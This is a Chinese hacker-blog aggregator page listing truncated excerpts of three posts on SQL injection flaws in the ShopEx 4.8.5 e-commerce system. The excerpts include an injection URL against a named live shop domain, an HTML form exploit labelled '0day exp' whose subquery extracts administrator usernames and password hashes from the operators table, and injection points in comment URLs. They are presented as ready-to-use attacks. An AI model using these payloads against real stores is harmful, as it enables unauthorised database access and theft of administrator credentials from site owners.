记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

shopex 4.8.5 产品筛选页面某处没有intval导致注入漏洞

漏洞提供者:蘑菇街 对漏洞提供者表示感谢。   涉及版本:shopex-single-4.8.5.80603是否需要登录:无需登录 是否默认配置:是有无利用代码:code 漏洞细节: 产品筛选页面 价格区间某处没有intval导致注入. http://www.dynest.com/readme.txt   9月2号的补丁 http://www.dynest.com/gallery--p,0,50%20and%200-0---1.html 没有产品       http:/
发布时间:2014-01-01 23:20 | 阅读:100771 | 评论:0 | 标签:渗透测试 ShopEx漏洞 注入 漏洞

shopex 4.8.5 api.php注入漏洞0day exp

<form method='post' action='http://www.site.com/api.php?act=search_dly_type&api_version=1.0'>columns:<input type='text' value='1,2,(SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1) as name' name='columns' style='width:80%'/><br /><input type='submit' value='submit' /><br /></form><script>//docu
发布时间:2013-08-06 02:10 | 阅读:198026 | 评论:0 | 标签:Vulndb Shopex漏洞 0day 注入 exp 漏洞

网店系统shopex最新注入漏洞通杀

注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… 好吧,我扯远了~~ 其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~ 不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下: http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html http://www.x.com/comment-8967′/**/and/**
发布时间:2013-02-04 03:40 | 阅读:334346 | 评论:1 | 标签:网络安全 shopex漏洞

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云